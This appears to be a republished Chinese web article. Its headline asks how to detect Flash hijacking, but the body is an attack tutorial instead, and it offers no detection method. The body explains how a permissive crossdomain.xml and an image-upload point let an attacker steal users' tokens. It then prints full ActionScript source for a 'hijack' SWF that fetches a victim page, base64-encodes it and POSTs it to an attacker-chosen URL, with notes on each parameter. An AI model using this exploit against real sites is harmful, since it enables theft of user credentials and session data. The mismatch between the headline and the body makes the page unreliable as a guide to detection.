通过什么样的办法检测flash是否被劫持?
iis7网站监控
网站的劫持、污染、flash劫持可检测。
Flash 劫持
当我们在挖src漏洞的时候,找到一个接口或者一个页面response内容,存在用户的token或者用户唯一标识的信息的时候,着要访问www..com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=".qq.com"/>
<allow-access-from domain=".gtimg.com"/>
</cross-domain-policy>
存在以上的情况,着要在.com找到一个可以上传图片的就可以进行劫持用户权限。
hijack源码:
package {
import flash.display.Sprite;
import flash.events.Event;
import flash.net.;
import flash.utils.ByteArray;
import flash.text.TextField;
public class hijack extends Sprite
{
private static const _encodeChars:Vector.<int> = _initEncoreChar();
public function hijack()
{
var params:Object=root.loaderInfo.parameters;
var jpg:URLRequest = new URLRequest(params.jpg);
jpg.method = URLRequestMethod.GET;
sendToURL(jpg);
var request:URLRequest = new URLRequest(params.get);
request.method = URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event):void{
var data:String=(loader.data);
var postURLrequest:URLRequest = new URLRequest(params.post);
postURLrequest.method = URLRequestMethod.POST;
var postdata:Object = new Array();
postdata[0]=encode(data);
postURLrequest.data = postdata[0];
sendToURL(postURLrequest);
}
loader.load(request);
}
public static function encode(data:String):String {
var bytes:ByteArray = new ByteArray();
bytes.writeUTFBytes(data);
return encodeByteArray(bytes);
}
public static function encodeByteArray(data:ByteArray):String {
var out:ByteArray = new ByteArray();
//Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
out.length = (2 + data.length - ((data.length + 2) % 3)) 4 / 3; //Preset length //1.6 to 1.5 ms
var i:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:uint; //read (3) character AND write (4) characters
var outPos:int = 0;
while(i < len) {
//Read 3 Characters (8bit * 3 = 24 bits)
c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
out[int(outPos++)] = _encodeChars[int(c >>> 18)];
out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
}
//Need two "=" padding
if(r == 1) {
//Read one char, write two chars, write padding
c = data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 2)];
out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
out[int(outPos++)] = 61;
out[int(outPos++)] = 61;
}
//Need one "=" padding
else if(r == 2) {
c = data[int(i++)] << 8 | data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 10)];
out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
out[int(outPos++)] = 61;
}
return out.readUTFBytes(out.length);
}
private static function _initEncoreChar():Vector.<int> {
var encodeChars:Vector.<int> = new Vector.<int>(64, true);
// We could push the number directly
// but I think it's nice to see the characters (with no overhead on encode/decode)
var chars:String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for(var i:int = 0; i<64; i++) {
encodeChars[i] = chars.charCodeAt(i);
}
return encodeChars;
}
}
}
参数说明:
jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)
get:劫持的接口或者页面
post:接收劫持过来的页面为base64传输
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
